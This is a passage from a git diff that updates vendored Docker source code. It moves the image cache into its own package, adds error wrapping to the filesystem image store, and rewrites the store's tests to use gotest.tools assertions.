All Go source files have been vetted.' -else - { - echo "Errors from go vet:" - for err in "${errors[@]}"; do - echo " - $err" - done - echo - echo 'Please fix the above errors. You can test via "go vet" and commit the result.' - echo - } >&2 - false -fi diff --git a/vendor/github.com/docker/docker/hack/vendor.sh b/vendor/github.com/docker/docker/hack/vendor.sh index 9a4d038539..a7a571e7b7 100755 --- a/vendor/github.com/docker/docker/hack/vendor.sh +++ b/vendor/github.com/docker/docker/hack/vendor.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # This file is just wrapper around vndr (github.com/LK4D4/vndr) tool. # For updating dependencies you should change `vendor.conf` file in root of the diff --git a/vendor/github.com/docker/docker/daemon/cache.go b/vendor/github.com/docker/docker/image/cache/cache.go similarity index 72% rename from vendor/github.com/docker/docker/daemon/cache.go rename to vendor/github.com/docker/docker/image/cache/cache.go index a2c2c137f5..6d3f4c57b5 100644 --- a/vendor/github.com/docker/docker/daemon/cache.go +++ b/vendor/github.com/docker/docker/image/cache/cache.go @@ -1,4 +1,4 @@ -package daemon +package cache // import "github.com/docker/docker/image/cache" import ( "encoding/json" @@ -6,94 +6,101 @@ import ( "reflect" "strings" - "github.com/Sirupsen/logrus" containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/builder" "github.com/docker/docker/dockerversion" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/runconfig" "github.com/pkg/errors" ) -// getLocalCachedImage returns the most recent created image that is a child -// of the image with imgID, that had the same config when it was -// created. nil is returned if a child cannot be found. An error is -// returned if the parent image cannot be found. 
-func (daemon *Daemon) getLocalCachedImage(imgID image.ID, config *containertypes.Config) (*image.Image, error) { - // Loop on the children of the given image and check the config - getMatch := func(siblings []image.ID) (*image.Image, error) { - var match *image.Image - for _, id := range siblings { - img, err := daemon.imageStore.Get(id) - if err != nil { - return nil, fmt.Errorf("unable to find image %q", id) - } - - if runconfig.Compare(&img.ContainerConfig, config) { - // check for the most up to date match - if match == nil || match.Created.Before(img.Created) { - match = img - } - } - } - return match, nil +// NewLocal returns a local image cache, based on parent chain +func NewLocal(store image.Store) *LocalImageCache { + return &LocalImageCache{ + store: store, } +} - // In this case, this is `FROM scratch`, which isn't an actual image. - if imgID == "" { - images := daemon.imageStore.Map() - var siblings []image.ID - for id, img := range images { - if img.Parent == imgID { - siblings = append(siblings, id) - } - } - return getMatch(siblings) - } +// LocalImageCache is cache based on parent chain. +type LocalImageCache struct { + store image.Store +} - // find match from child images - siblings := daemon.imageStore.Children(imgID) - return getMatch(siblings) +// GetCache returns the image id found in the cache +func (lic *LocalImageCache) GetCache(imgID string, config *containertypes.Config) (string, error) { + return getImageIDAndError(getLocalCachedImage(lic.store, image.ID(imgID), config)) } -// MakeImageCache creates a stateful image cache. 
-func (daemon *Daemon) MakeImageCache(sourceRefs []string) builder.ImageCache { - if len(sourceRefs) == 0 { - return &localImageCache{daemon} +// New returns an image cache, based on history objects +func New(store image.Store) *ImageCache { + return &ImageCache{ + store: store, + localImageCache: NewLocal(store), } +} - cache := &imageCache{daemon: daemon, localImageCache: &localImageCache{daemon}} +// ImageCache is cache based on history objects. Requires initial set of images. +type ImageCache struct { + sources []*image.Image + store image.Store + localImageCache *LocalImageCache +} + +// Populate adds an image to the cache (to be queried later) +func (ic *ImageCache) Populate(image *image.Image) { + ic.sources = append(ic.sources, image) +} + +// GetCache returns the image id found in the cache +func (ic *ImageCache) GetCache(parentID string, cfg *containertypes.Config) (string, error) { + imgID, err := ic.localImageCache.GetCache(parentID, cfg) + if err != nil { + return "", err + } + if imgID != "" { + for _, s := range ic.sources { + if ic.isParent(s.ID(), image.ID(imgID)) { + return imgID, nil + } + } + } - for _, ref := range sourceRefs { - img, err := daemon.GetImage(ref) + var parent *image.Image + lenHistory := 0 + if parentID != "" { + parent, err = ic.store.Get(image.ID(parentID)) if err != nil { - logrus.Warnf("Could not look up %s for cache resolution, skipping: %+v", ref, err) - continue + return "", errors.Wrapf(err, "unable to find image %v", parentID) } - cache.sources = append(cache.sources, img) + lenHistory = len(parent.History) } - return cache -} + for _, target := range ic.sources { + if !isValidParent(target, parent) || !isValidConfig(cfg, target.History[lenHistory]) { + continue + } -// localImageCache is cache based on parent chain. 
-type localImageCache struct { - daemon *Daemon -} + if len(target.History)-1 == lenHistory { // last + if parent != nil { + if err := ic.store.SetParent(target.ID(), parent.ID()); err != nil { + return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) + } + } + return target.ID().String(), nil + } -func (lic *localImageCache) GetCache(imgID string, config *containertypes.Config) (string, error) { - return getImageIDAndError(lic.daemon.getLocalCachedImage(image.ID(imgID), config)) -} + imgID, err := ic.restoreCachedImage(parent, target, cfg) + if err != nil { + return "", errors.Wrapf(err, "failed to restore cached image from %q to %v", parentID, target.ID()) + } -// imageCache is cache based on history objects. Requires initial set of images. -type imageCache struct { - sources []*image.Image - daemon *Daemon - localImageCache *localImageCache + ic.sources = []*image.Image{target} // avoid jumping to different target, tuned for safety atm + return imgID.String(), nil + } + + return "", nil } -func (ic *imageCache) restoreCachedImage(parent, target *image.Image, cfg *containertypes.Config) (image.ID, error) { +func (ic *ImageCache) restoreCachedImage(parent, target *image.Image, cfg *containertypes.Config) (image.ID, error) { var history []image.History rootFS := image.NewRootFS() lenHistory := 0 @@ -125,21 +132,21 @@ func (ic *imageCache) restoreCachedImage(parent, target *image.Image, cfg *conta return "", errors.Wrap(err, "failed to marshal image config") } - imgID, err := ic.daemon.imageStore.Create(config) + imgID, err := ic.store.Create(config) if err != nil { return "", errors.Wrap(err, "failed to create cache image") } if parent != nil { - if err := ic.daemon.imageStore.SetParent(imgID, parent.ID()); err != nil { + if err := ic.store.SetParent(imgID, parent.ID()); err != nil { return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) } } return imgID, nil } -func (ic *imageCache) 
isParent(imgID, parentID image.ID) bool { - nextParent, err := ic.daemon.imageStore.GetParent(imgID) +func (ic *ImageCache) isParent(imgID, parentID image.ID) bool { + nextParent, err := ic.store.GetParent(imgID) if err != nil { return false } @@ -149,60 +156,25 @@ func (ic *imageCache) isParent(imgID, parentID image.ID) bool { return ic.isParent(nextParent, parentID) } -func (ic *imageCache) GetCache(parentID string, cfg *containertypes.Config) (string, error) { - imgID, err := ic.localImageCache.GetCache(parentID, cfg) - if err != nil { - return "", err - } - if imgID != "" { - for _, s := range ic.sources { - if ic.isParent(s.ID(), image.ID(imgID)) { - return imgID, nil - } - } - } - - var parent *image.Image - lenHistory := 0 - if parentID != "" { - parent, err = ic.daemon.imageStore.Get(image.ID(parentID)) - if err != nil { - return "", errors.Wrapf(err, "unable to find image %v", parentID) - } - lenHistory = len(parent.History) - } - - for _, target := range ic.sources { - if !isValidParent(target, parent) || !isValidConfig(cfg, target.History[lenHistory]) { - continue - } - - if len(target.History)-1 == lenHistory { // last - if parent != nil { - if err := ic.daemon.imageStore.SetParent(target.ID(), parent.ID()); err != nil { - return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) - } +func getLayerForHistoryIndex(image *image.Image, index int) layer.DiffID { + layerIndex := 0 + for i, h := range image.History { + if i == index { + if h.EmptyLayer { + return "" } - return target.ID().String(), nil + break } - - imgID, err := ic.restoreCachedImage(parent, target, cfg) - if err != nil { - return "", errors.Wrapf(err, "failed to restore cached image from %q to %v", parentID, target.ID()) + if !h.EmptyLayer { + layerIndex++ } - - ic.sources = []*image.Image{target} // avoid jumping to different target, tuned for safety atm - return imgID.String(), nil } - - return "", nil + return image.RootFS.DiffIDs[layerIndex] // 
validate? } -func getImageIDAndError(img *image.Image, err error) (string, error) { - if img == nil || err != nil { - return "", err - } - return img.ID().String(), nil +func isValidConfig(cfg *containertypes.Config, h image.History) bool { + // todo: make this format better than join that loses data + return strings.Join(cfg.Cmd, " ") == h.CreatedBy } func isValidParent(img, parent *image.Image) bool { @@ -215,7 +187,7 @@ func isValidParent(img, parent *image.Image) bool { if len(parent.History) >= len(img.History) { return false } - if len(parent.RootFS.DiffIDs) >= len(img.RootFS.DiffIDs) { + if len(parent.RootFS.DiffIDs) > len(img.RootFS.DiffIDs) { return false } @@ -232,23 +204,50 @@ func isValidParent(img, parent *image.Image) bool { return true } -func getLayerForHistoryIndex(image *image.Image, index int) layer.DiffID { - layerIndex := 0 - for i, h := range image.History { - if i == index { - if h.EmptyLayer { - return "" +func getImageIDAndError(img *image.Image, err error) (string, error) { + if img == nil || err != nil { + return "", err + } + return img.ID().String(), nil +} + +// getLocalCachedImage returns the most recent created image that is a child +// of the image with imgID, that had the same config when it was +// created. nil is returned if a child cannot be found. An error is +// returned if the parent image cannot be found. 
+func getLocalCachedImage(imageStore image.Store, imgID image.ID, config *containertypes.Config) (*image.Image, error) { + // Loop on the children of the given image and check the config + getMatch := func(siblings []image.ID) (*image.Image, error) { + var match *image.Image + for _, id := range siblings { + img, err := imageStore.Get(id) + if err != nil { + return nil, fmt.Errorf("unable to find image %q", id) + } + + if compare(&img.ContainerConfig, config) { + // check for the most up to date match + if match == nil || match.Created.Before(img.Created) { + match = img + } } - break } - if !h.EmptyLayer { - layerIndex++ + return match, nil + } + + // In this case, this is `FROM scratch`, which isn't an actual image. + if imgID == "" { + images := imageStore.Map() + var siblings []image.ID + for id, img := range images { + if img.Parent == imgID { + siblings = append(siblings, id) + } } + return getMatch(siblings) } - return image.RootFS.DiffIDs[layerIndex] // validate? -} -func isValidConfig(cfg *containertypes.Config, h image.History) bool { - // todo: make this format better than join that loses data - return strings.Join(cfg.Cmd, " ") == h.CreatedBy + // find match from child images + siblings := imageStore.Children(imgID) + return getMatch(siblings) } diff --git a/vendor/github.com/docker/docker/runconfig/compare.go b/vendor/github.com/docker/docker/image/cache/compare.go similarity index 82% rename from vendor/github.com/docker/docker/runconfig/compare.go rename to vendor/github.com/docker/docker/image/cache/compare.go index 708922f986..e31e9c8bdf 100644 --- a/vendor/github.com/docker/docker/runconfig/compare.go +++ b/vendor/github.com/docker/docker/image/cache/compare.go @@ -1,10 +1,12 @@ -package runconfig +package cache // import "github.com/docker/docker/image/cache" -import "github.com/docker/docker/api/types/container" +import ( + "github.com/docker/docker/api/types/container" +) -// Compare two Config struct. 
Do not compare the "Image" nor "Hostname" fields +// compare two Config struct. Do not compare the "Image" nor "Hostname" fields // If OpenStdin is set, then it differs -func Compare(a, b *container.Config) bool { +func compare(a, b *container.Config) bool { if a == nil || b == nil || a.OpenStdin || b.OpenStdin { return false diff --git a/vendor/github.com/docker/docker/runconfig/compare_test.go b/vendor/github.com/docker/docker/image/cache/compare_test.go similarity index 68% rename from vendor/github.com/docker/docker/runconfig/compare_test.go rename to vendor/github.com/docker/docker/image/cache/compare_test.go index 6370d7a887..939e99f050 100644 --- a/vendor/github.com/docker/docker/runconfig/compare_test.go +++ b/vendor/github.com/docker/docker/image/cache/compare_test.go @@ -1,4 +1,4 @@ -package runconfig +package cache // import "github.com/docker/docker/image/cache" import ( "testing" @@ -46,9 +46,9 @@ func TestCompare(t *testing.T) { sameConfigs := map[*container.Config]*container.Config{ // Empty config - &container.Config{}: {}, + {}: {}, // Does not compare hostname, domainname & image - &container.Config{ + { Hostname: "host1", Domainname: "domain1", Image: "image1", @@ -60,23 +60,23 @@ func TestCompare(t *testing.T) { User: "user", }, // only OpenStdin - &container.Config{OpenStdin: false}: {OpenStdin: false}, + {OpenStdin: false}: {OpenStdin: false}, // only env - &container.Config{Env: envs1}: {Env: envs1}, + {Env: envs1}: {Env: envs1}, // only cmd - &container.Config{Cmd: cmd1}: {Cmd: cmd1}, + {Cmd: cmd1}: {Cmd: cmd1}, // only labels - &container.Config{Labels: labels1}: {Labels: labels1}, + {Labels: labels1}: {Labels: labels1}, // only exposedPorts - &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports1}, + {ExposedPorts: ports1}: {ExposedPorts: ports1}, // only entrypoints - &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint1}, + {Entrypoint: entrypoint1}: {Entrypoint: entrypoint1}, // only volumes - 
&container.Config{Volumes: volumes1}: {Volumes: volumes1}, + {Volumes: volumes1}: {Volumes: volumes1}, } differentConfigs := map[*container.Config]*container.Config{ nil: nil, - &container.Config{ + { Hostname: "host1", Domainname: "domain1", Image: "image1", @@ -88,38 +88,38 @@ func TestCompare(t *testing.T) { User: "user2", }, // only OpenStdin - &container.Config{OpenStdin: false}: {OpenStdin: true}, - &container.Config{OpenStdin: true}: {OpenStdin: false}, + {OpenStdin: false}: {OpenStdin: true}, + {OpenStdin: true}: {OpenStdin: false}, // only env - &container.Config{Env: envs1}: {Env: envs2}, + {Env: envs1}: {Env: envs2}, // only cmd - &container.Config{Cmd: cmd1}: {Cmd: cmd2}, + {Cmd: cmd1}: {Cmd: cmd2}, // not the same number of parts - &container.Config{Cmd: cmd1}: {Cmd: cmd3}, + {Cmd: cmd1}: {Cmd: cmd3}, // only labels - &container.Config{Labels: labels1}: {Labels: labels2}, + {Labels: labels1}: {Labels: labels2}, // not the same number of labels - &container.Config{Labels: labels1}: {Labels: labels3}, + {Labels: labels1}: {Labels: labels3}, // only exposedPorts - &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports2}, + {ExposedPorts: ports1}: {ExposedPorts: ports2}, // not the same number of ports - &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports3}, + {ExposedPorts: ports1}: {ExposedPorts: ports3}, // only entrypoints - &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint2}, + {Entrypoint: entrypoint1}: {Entrypoint: entrypoint2}, // not the same number of parts - &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint3}, + {Entrypoint: entrypoint1}: {Entrypoint: entrypoint3}, // only volumes - &container.Config{Volumes: volumes1}: {Volumes: volumes2}, + {Volumes: volumes1}: {Volumes: volumes2}, // not the same number of labels - &container.Config{Volumes: volumes1}: {Volumes: volumes3}, + {Volumes: volumes1}: {Volumes: volumes3}, } for config1, config2 := range sameConfigs { - if !Compare(config1, 
config2) { + if !compare(config1, config2) { t.Fatalf("Compare should be true for [%v] and [%v]", config1, config2) } } for config1, config2 := range differentConfigs { - if Compare(config1, config2) { + if compare(config1, config2) { t.Fatalf("Compare should be false for [%v] and [%v]", config1, config2) } } diff --git a/vendor/github.com/docker/docker/image/fs.go b/vendor/github.com/docker/docker/image/fs.go index 39cfbf5d74..7080c8c015 100644 --- a/vendor/github.com/docker/docker/image/fs.go +++ b/vendor/github.com/docker/docker/image/fs.go @@ -1,4 +1,4 @@ -package image +package image // import "github.com/docker/docker/image" import ( "fmt" @@ -7,9 +7,10 @@ import ( "path/filepath" "sync" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/pkg/ioutils" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // DigestWalkFunc is function called by StoreBackend.Walk @@ -47,10 +48,10 @@ func newFSStore(root string) (*fs, error) { root: root, } if err := os.MkdirAll(filepath.Join(root, contentDirName, string(digest.Canonical)), 0700); err != nil { - return nil, err + return nil, errors.Wrap(err, "failed to create storage backend") } if err := os.MkdirAll(filepath.Join(root, metadataDirName, string(digest.Canonical)), 0700); err != nil { - return nil, err + return nil, errors.Wrap(err, "failed to create storage backend") } return s, nil } @@ -75,7 +76,7 @@ func (s *fs) Walk(f DigestWalkFunc) error { for _, v := range dir { dgst := digest.NewDigestFromHex(string(digest.Canonical), v.Name()) if err := dgst.Validate(); err != nil { - logrus.Debugf("Skipping invalid digest %s: %s", dgst, err) + logrus.Debugf("skipping invalid digest %s: %s", dgst, err) continue } if err := f(dgst); err != nil { @@ -96,7 +97,7 @@ func (s *fs) Get(dgst digest.Digest) ([]byte, error) { func (s *fs) get(dgst digest.Digest) ([]byte, error) { content, err := ioutil.ReadFile(s.contentFile(dgst)) if err 
!= nil { - return nil, err + return nil, errors.Wrapf(err, "failed to get digest %s", dgst) } // todo: maybe optional @@ -113,12 +114,12 @@ func (s *fs) Set(data []byte) (digest.Digest, error) { defer s.Unlock() if len(data) == 0 { - return "", fmt.Errorf("Invalid empty data") + return "", fmt.Errorf("invalid empty data") } dgst := digest.FromBytes(data) if err := ioutils.AtomicWriteFile(s.contentFile(dgst), data, 0600); err != nil { - return "", err + return "", errors.Wrap(err, "failed to write digest data") } return dgst, nil @@ -132,10 +133,7 @@ func (s *fs) Delete(dgst digest.Digest) error { if err := os.RemoveAll(s.metadataDir(dgst)); err != nil { return err } - if err := os.Remove(s.contentFile(dgst)); err != nil { - return err - } - return nil + return os.Remove(s.contentFile(dgst)) } // SetMetadata sets metadata for a given ID. It fails if there's no base file. @@ -161,7 +159,11 @@ func (s *fs) GetMetadata(dgst digest.Digest, key string) ([]byte, error) { if _, err := s.get(dgst); err != nil { return nil, err } - return ioutil.ReadFile(filepath.Join(s.metadataDir(dgst), key)) + bytes, err := ioutil.ReadFile(filepath.Join(s.metadataDir(dgst), key)) + if err != nil { + return nil, errors.Wrap(err, "failed to read metadata") + } + return bytes, nil } // DeleteMetadata removes the metadata associated with a digest. 
diff --git a/vendor/github.com/docker/docker/image/fs_test.go b/vendor/github.com/docker/docker/image/fs_test.go index 8d602d97eb..6290c2b66e 100644 --- a/vendor/github.com/docker/docker/image/fs_test.go +++ b/vendor/github.com/docker/docker/image/fs_test.go @@ -1,7 +1,6 @@ -package image +package image // import "github.com/docker/docker/image" import ( - "bytes" "crypto/rand" "crypto/sha256" "encoding/hex" @@ -11,79 +10,52 @@ import ( "path/filepath" "testing" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -func TestFSGetSet(t *testing.T) { +func defaultFSStoreBackend(t *testing.T) (StoreBackend, func()) { tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) - testGetSet(t, fs) + fsBackend, err := NewFSStoreBackend(tmpdir) + assert.Check(t, err) + + return fsBackend, func() { os.RemoveAll(tmpdir) } } func TestFSGetInvalidData(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() - id, err := fs.Set([]byte("foobar")) - if err != nil { - t.Fatal(err) - } + id, err := store.Set([]byte("foobar")) + assert.Check(t, err) dgst := digest.Digest(id) - if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, string(dgst.Algorithm()), dgst.Hex()), []byte("foobar2"), 0600); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(store.(*fs).root, contentDirName, string(dgst.Algorithm()), dgst.Hex()), []byte("foobar2"), 0600) + assert.Check(t, err) - _, err = fs.Get(id) - if err == nil { - t.Fatal("Expected get to fail after data modification.") - } + _, err = store.Get(id) + 
assert.Check(t, is.ErrorContains(err, "failed to verify")) } func TestFSInvalidSet(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() id := digest.FromBytes([]byte("foobar")) - err = os.Mkdir(filepath.Join(tmpdir, contentDirName, string(id.Algorithm()), id.Hex()), 0700) - if err != nil { - t.Fatal(err) - } + err := os.Mkdir(filepath.Join(store.(*fs).root, contentDirName, string(id.Algorithm()), id.Hex()), 0700) + assert.Check(t, err) - _, err = fs.Set([]byte("foobar")) - if err == nil { - t.Fatal("Expecting error from invalid filesystem data.") - } + _, err = store.Set([]byte("foobar")) + assert.Check(t, is.ErrorContains(err, "failed to write digest data")) } func TestFSInvalidRoot(t *testing.T) { tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) defer os.RemoveAll(tmpdir) tcases := []struct { @@ -98,34 +70,29 @@ func TestFSInvalidRoot(t *testing.T) { root := filepath.Join(tmpdir, tc.root) filePath := filepath.Join(tmpdir, tc.invalidFile) err := os.MkdirAll(filepath.Dir(filePath), 0700) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + f, err := os.Create(filePath) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) f.Close() _, err = NewFSStoreBackend(root) - if err == nil { - t.Fatalf("Expected error from root %q and invlid file %q", tc.root, tc.invalidFile) - } + assert.Check(t, is.ErrorContains(err, "failed to create storage backend")) os.RemoveAll(root) } } -func testMetadataGetSet(t *testing.T, store StoreBackend) { +func TestFSMetadataGetSet(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + id, err := store.Set([]byte("foo")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + id2, err := store.Set([]byte("bar")) - 
if err != nil { - t.Fatal(err) - } + assert.Check(t, err) tcases := []struct { id digest.Digest @@ -139,115 +106,49 @@ func testMetadataGetSet(t *testing.T, store StoreBackend) { for _, tc := range tcases { err = store.SetMetadata(tc.id, tc.key, tc.value) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) actual, err := store.GetMetadata(tc.id, tc.key) - if err != nil { - t.Fatal(err) - } - if bytes.Compare(actual, tc.value) != 0 { - t.Fatalf("Metadata expected %q, got %q", tc.value, actual) - } + assert.Check(t, err) + + assert.Check(t, is.DeepEqual(tc.value, actual)) } _, err = store.GetMetadata(id2, "tkey2") - if err == nil { - t.Fatal("Expected error for getting metadata for unknown key") - } + assert.Check(t, is.ErrorContains(err, "failed to read metadata")) id3 := digest.FromBytes([]byte("baz")) err = store.SetMetadata(id3, "tkey", []byte("tval")) - if err == nil { - t.Fatal("Expected error for setting metadata for unknown ID.") - } + assert.Check(t, is.ErrorContains(err, "failed to get digest")) _, err = store.GetMetadata(id3, "tkey") - if err == nil { - t.Fatal("Expected error for getting metadata for unknown ID.") - } -} - -func TestFSMetadataGetSet(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - testMetadataGetSet(t, fs) -} - -func TestFSDelete(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - testDelete(t, fs) -} - -func TestFSWalker(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - testWalker(t, fs) + assert.Check(t, is.ErrorContains(err, "failed to 
get digest")) } func TestFSInvalidWalker(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() - fooID, err := fs.Set([]byte("foo")) - if err != nil { - t.Fatal(err) - } + fooID, err := store.Set([]byte("foo")) + assert.Check(t, err) - if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, "sha256/foobar"), []byte("foobar"), 0600); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(store.(*fs).root, contentDirName, "sha256/foobar"), []byte("foobar"), 0600) + assert.Check(t, err) n := 0 - err = fs.Walk(func(id digest.Digest) error { - if id != fooID { - t.Fatalf("Invalid walker ID %q, expected %q", id, fooID) - } + err = store.Walk(func(id digest.Digest) error { + assert.Check(t, is.Equal(fooID, id)) n++ return nil }) - if err != nil { - t.Fatalf("Invalid data should not have caused walker error, got %v", err) - } - if n != 1 { - t.Fatalf("Expected 1 walk initialization, got %d", n) - } + assert.Check(t, err) + assert.Check(t, is.Equal(1, n)) } -func testGetSet(t *testing.T, store StoreBackend) { +func TestFSGetSet(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + type tcase struct { input []byte expected digest.Digest @@ -258,15 +159,13 @@ func testGetSet(t *testing.T, store StoreBackend) { randomInput := make([]byte, 8*1024) _, err := rand.Read(randomInput) - if err != nil { - t.Fatal(err) - } - // skipping use of digest pkg because its used by the implementation + assert.Check(t, err) + + // skipping use of digest pkg because it is used by the implementation h := sha256.New() _, err = h.Write(randomInput) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + tcases = append(tcases, tcase{ input: randomInput, expected: digest.Digest("sha256:" + hex.EncodeToString(h.Sum(nil))), 
@@ -274,83 +173,72 @@ func testGetSet(t *testing.T, store StoreBackend) { for _, tc := range tcases { id, err := store.Set([]byte(tc.input)) - if err != nil { - t.Fatal(err) - } - if id != tc.expected { - t.Fatalf("Expected ID %q, got %q", tc.expected, id) - } - } - - for _, emptyData := range [][]byte{nil, {}} { - _, err := store.Set(emptyData) - if err == nil { - t.Fatal("Expected error for nil input.") - } + assert.Check(t, err) + assert.Check(t, is.Equal(tc.expected, id)) } for _, tc := range tcases { data, err := store.Get(tc.expected) - if err != nil { - t.Fatal(err) - } - if bytes.Compare(data, tc.input) != 0 { - t.Fatalf("Expected data %q, got %q", tc.input, data) - } + assert.Check(t, err) + assert.Check(t, is.DeepEqual(tc.input, data)) } +} + +func TestFSGetUnsetKey(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() for _, key := range []digest.Digest{"foobar:abc", "sha256:abc", "sha256:c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2a"} { _, err := store.Get(key) - if err == nil { - t.Fatalf("Expected error for ID %q.", key) - } + assert.Check(t, is.ErrorContains(err, "failed to get digest")) } +} +func TestFSGetEmptyData(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + + for _, emptyData := range [][]byte{nil, {}} { + _, err := store.Set(emptyData) + assert.Check(t, is.ErrorContains(err, "invalid empty data")) + } } -func testDelete(t *testing.T, store StoreBackend) { +func TestFSDelete(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + id, err := store.Set([]byte("foo")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + id2, err := store.Set([]byte("bar")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) err = store.Delete(id) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) _, err = store.Get(id) - if err == nil { - t.Fatalf("Expected getting deleted item %q to fail", id) - } + assert.Check(t, 
is.ErrorContains(err, "failed to get digest")) + _, err = store.Get(id2) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) err = store.Delete(id2) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + _, err = store.Get(id2) - if err == nil { - t.Fatalf("Expected getting deleted item %q to fail", id2) - } + assert.Check(t, is.ErrorContains(err, "failed to get digest")) } -func testWalker(t *testing.T, store StoreBackend) { +func TestFSWalker(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + id, err := store.Set([]byte("foo")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + id2, err := store.Set([]byte("bar")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) tcases := make(map[digest.Digest]struct{}) tcases[id] = struct{}{} @@ -361,24 +249,22 @@ func testWalker(t *testing.T, store StoreBackend) { n++ return nil }) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + assert.Check(t, is.Equal(2, n)) + assert.Check(t, is.Len(tcases, 0)) +} - if n != 2 { - t.Fatalf("Expected 2 walk initializations, got %d", n) - } - if len(tcases) != 0 { - t.Fatalf("Expected empty unwalked set, got %+v", tcases) - } +func TestFSWalkerStopOnError(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + + id, err := store.Set([]byte("foo")) + assert.Check(t, err) - // stop on error - tcases = make(map[digest.Digest]struct{}) + tcases := make(map[digest.Digest]struct{}) tcases[id] = struct{}{} err = store.Walk(func(id digest.Digest) error { - return errors.New("") + return errors.New("what") }) - if err == nil { - t.Fatalf("Exected error from walker.") - } + assert.Check(t, is.ErrorContains(err, "what")) } diff --git a/vendor/github.com/docker/docker/image/image.go b/vendor/github.com/docker/docker/image/image.go index 29a990a556..7e0646f072 100644 --- a/vendor/github.com/docker/docker/image/image.go +++ b/vendor/github.com/docker/docker/image/image.go @@ -1,13 +1,17 @@ -package image 
+package image // import "github.com/docker/docker/image" import ( "encoding/json" "errors" "io" + "runtime" + "strings" "time" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types/container" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" ) // ID is the content-addressable ID of an image. @@ -29,25 +33,25 @@ func IDFromDigest(digest digest.Digest) ID { // V1Image stores the V1 image configuration. type V1Image struct { - // ID a unique 64 character identifier of the image + // ID is a unique 64 character identifier of the image ID string `json:"id,omitempty"` - // Parent id of the image + // Parent is the ID of the parent image Parent string `json:"parent,omitempty"` - // Comment user added comment + // Comment is the commit message that was set when committing the image Comment string `json:"comment,omitempty"` - // Created timestamp when image was created + // Created is the timestamp at which the image was created Created time.Time `json:"created"` // Container is the id of the container used to commit Container string `json:"container,omitempty"` // ContainerConfig is the configuration of the container that is committed into the image ContainerConfig container.Config `json:"container_config,omitempty"` - // DockerVersion specifies version on which image is built + // DockerVersion specifies the version of 